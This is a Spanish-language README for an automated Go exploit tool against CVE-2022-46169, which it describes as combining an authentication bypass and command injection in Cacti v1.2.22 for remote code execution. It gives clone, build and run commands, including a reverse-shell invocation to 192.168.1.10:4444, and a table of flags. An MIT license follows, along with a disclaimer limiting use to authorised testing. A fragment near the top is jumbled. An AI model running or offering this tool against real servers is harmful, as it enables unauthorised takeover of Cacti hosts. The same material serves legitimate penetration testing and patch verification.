
Esta es una herramienta de explotación automatizada para CVE-2022-46169, una vulnerabilidad en Cacti v1.2.22 que permite la ejecución remota de código (RCE). Combina un bypass de autenticación y una vulnerabilidad de inyección de comandos en el endpoint remote_agent.php. El script está diseñado para la evaluación de seguridad y las pruebas de penetración.
127.0.0.1:8080--verbose) para salida de depuración detalladagit clone https://github.com/pozr/CVE-2022-46169-Cacti-v1.2.22.git
cd CVE-2022-46169-Cacti-v1.2.22
go build CVE-2022-46169-Cacti-v1.2.22.go
./CVE-2022-46169-Cacti-v1.2.22 -u http://127.0.0.1 -p 80
Para una reverse shell a un host y puerto específicos:
./CVE-2022-46169-Cacti-v1.2.22 -u http://127.0.0.1 -p 80 --rev 192.168.1.10:4444
Esta herramienta es solo para fines educativos y de pruebas autorizadas. El autor no es responsable del mal uso.
Licencia MIT
Copyright (c) 2024 pozr
Por la presente se concede permiso, de forma gratuita, a cualquier persona que obtenga una copia de este software y de los archivos de documentación asociados (el "Software"), para tratar con el Software sin restricción, incluidos, sin limitación, los derechos de usar, copiar, modificar, fusionar, publicar, distribuir, sublicenciar y/o vender copias del Software, y de permitir a las personas a las que se les proporcione el Software hacer lo mismo, sujeto a las siguientes condiciones:
El aviso de copyright anterior y este aviso de permiso deberán incluirse en todas las copias o partes sustanciales del Software.
EL SOFTWARE SE PROPORCIONA "TAL CUAL", SIN GARANTÍA DE NINGÚN TIPO, EXPRESA O IMPLÍCITA, INCLUIDAS, ENTRE OTRAS, LAS GARANTÍAS DE COMERCIABILIDAD, IDONEIDAD PARA UN FIN PARTICULAR Y NO INFRACCIÓN. EN NINGÚN CASO LOS AUTORES O TITULARES DEL COPYRIGHT SERÁN RESPONSABLES DE CUALQUIER RECLAMO, DAÑOS U OTRA RESPONSABILIDAD, YA SEA EN UNA ACCIÓN DE CONTRATO, AGRAVIO O DE OTRO MODO, QUE SURJA DE, O EN CONEXIÓN CON, EL SOFTWARE O EL USO U OTRO TIPO DE ACCIONES EN EL SOFTWARE.
| Flag | Descripción | Por defecto |
|---|
-u | URL del objetivo (obligatorio) | Ninguno |
-p | Puerto del objetivo (obligatorio) | Ninguno |
--rev | Host:puerto de la reverse shell | Vacío |
--verbose | Habilitar modo verbose | Falso |
--proxy | Forzar el uso del proxy 127.0.0.1:8080 | Falso |